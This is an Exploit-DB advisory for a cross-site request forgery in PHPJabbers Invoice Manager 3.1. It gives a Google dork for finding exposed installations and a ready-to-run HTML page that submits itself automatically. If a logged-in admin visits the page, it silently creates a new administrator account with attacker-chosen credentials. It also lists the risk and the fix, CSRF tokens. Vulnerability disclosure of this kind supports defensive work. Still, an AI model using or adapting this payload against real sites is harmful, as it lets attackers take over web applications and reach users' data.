Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

42592

CVE:

N/A




Platform:

PHP

Date:

2017-08-30


# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<!-- 
# Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: inurl:controller=pjAdmin
# Date: 30.08.2017
# Homepage: https://www.phpjabbers.com/invoice-manager/
# Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
# Version: 3.1
# Category: Webapps /php 
# Tested on: mozila firefox 
# 
#
-->

# ========================================================
#
#
# Invoice Manager v3.1 Cross site request forgery (Add Admin)
# 
# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
# Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
#
#
# ======================CSRF POC (Adding New user with Administrator Privileges)==================================


<html>
<body>
<form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">

<input name="user_create" id="user_create" value="1" type="hidden">
<input name="role_id" id="role_id" value="1" type="hidden" >
<input name="email" id="email" value="AliBawazeEer@localhost.com" type="hidden">
<input name="password" id="password" value="12341234" type="hidden">
<input name="name" id="name" value="Ali BawazeEer" type="hidden">
<input name="phone" id="phone" value="911911911" type="hidden">
<input name="status" id="status" value="T" type="hidden">
<script type="text/javascript">document.csrf_form.submit();</script>
</body>
</html>

# =================================================EOF =======================================================
#
#
# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
#
#
# Remedy : developer should implement CSRF token for each request  
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #